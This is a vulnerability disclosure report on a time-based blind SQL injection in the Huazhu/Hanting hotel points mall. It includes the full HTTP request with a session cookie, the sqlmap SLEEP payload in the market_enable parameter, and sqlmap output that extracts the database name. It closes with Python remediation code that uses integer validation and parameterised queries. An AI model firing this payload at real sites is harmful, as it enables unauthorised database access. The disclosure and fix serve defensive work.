Hanting Hotel points mall system SQL injection vulnerability (root privileges)
As the title says.
GET /hmall/webapp/storeCatGoods!listStoreGoodsJson.do?disable=0&market_enable=1&page=1&rows=10&store_id=16&_=1449301268455 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://hmall.huazhu.com:80/
Cookie: JSESSIONID=15DEC9589FC499A4A0014C2C69311945
Host: hmall.huazhu.com

Injection parameter: market_enable
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://hmall.huazhu.com:80/hmall/webapp/storeCatGoods!listStoreGoodsJson.do?disable=0&market_enable=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OYQx)&page=1&rows=10&store_id=16&_=1449301268455
---
[15:58:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[15:58:16] [INFO] fetching current database
[15:58:16] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[15:58:16] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[15:59:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[16:00:17] [INFO] adjusting time delay to 4 seconds due to good response times
hmallb2c
current database: 'hmallb2c'
[16:04:09] [INFO] fetched data logged to text files under '/Users/farmer/.sqlmap/output/hmall.huazhu.com'
[*] shutting down at 16:04:09
Solution:
Filter the request parameters for SQL injection.
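The fix the report asks for, as an added example that is not code from the hmall application: every parameter of listStoreGoodsJson.do (disable, market_enable, page, rows, store_id) is numeric, so anything that is not a bare integer is rejected before it reaches the database, and the values are bound as query parameters instead of being concatenated into the SQL text. The store_goods table and its rows are constructed, and sqlite3 stands in for MySQL.

```python
import re
import sqlite3

# Every parameter of listStoreGoodsJson.do in the report is numeric, so a
# strict allow-list is possible: plain decimal digits only, with bounds.
_INT_RE = re.compile(r"^\d{1,9}$")
_FLAG_PARAMS = ("disable", "market_enable")   # only 0 or 1 make sense
_INT_PARAMS = ("page", "rows", "store_id")

def parse_goods_query(params):
    """Validate the request parameters; raise ValueError on anything that
    is not a bare integer (e.g. '1 AND (SELECT ... SLEEP(5) ...)')."""
    clean = {}
    for name in _FLAG_PARAMS + _INT_PARAMS:
        raw = params.get(name, "")
        if not _INT_RE.match(raw):
            raise ValueError(f"parameter {name!r} must be an integer, got {raw!r}")
        value = int(raw)
        if name in _FLAG_PARAMS and value not in (0, 1):
            raise ValueError(f"parameter {name!r} must be 0 or 1")
        clean[name] = value
    if clean["page"] < 1 or not 1 <= clean["rows"] <= 100:
        raise ValueError("page must be >= 1 and rows between 1 and 100")
    return clean

def list_store_goods(conn, params):
    """Run the goods query with bound parameters; the client's values can
    never change the SQL text, so there is nothing left to inject into."""
    q = parse_goods_query(params)
    sql = ("SELECT goods_id, name FROM store_goods "
           "WHERE store_id = ? AND disable = ? AND market_enable = ? "
           "ORDER BY goods_id LIMIT ? OFFSET ?")
    args = (q["store_id"], q["disable"], q["market_enable"],
            q["rows"], (q["page"] - 1) * q["rows"])
    return conn.execute(sql, args).fetchall()

def demo_db():
    """Constructed sample table standing in for the mall's goods table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE store_goods (goods_id INTEGER, store_id INTEGER, "
                 "disable INTEGER, market_enable INTEGER, name TEXT)")
    conn.executemany("INSERT INTO store_goods VALUES (?,?,?,?,?)", [
        (1, 16, 0, 1, "breakfast voucher"),
        (2, 16, 0, 1, "late checkout"),
        (3, 16, 1, 1, "retired item"),
        (4, 17, 0, 1, "other store item"),
    ])
    return conn
```

With this in place the sqlmap payload from the report is rejected with a ValueError at validation, and the legitimate request from the report returns only store 16's enabled goods.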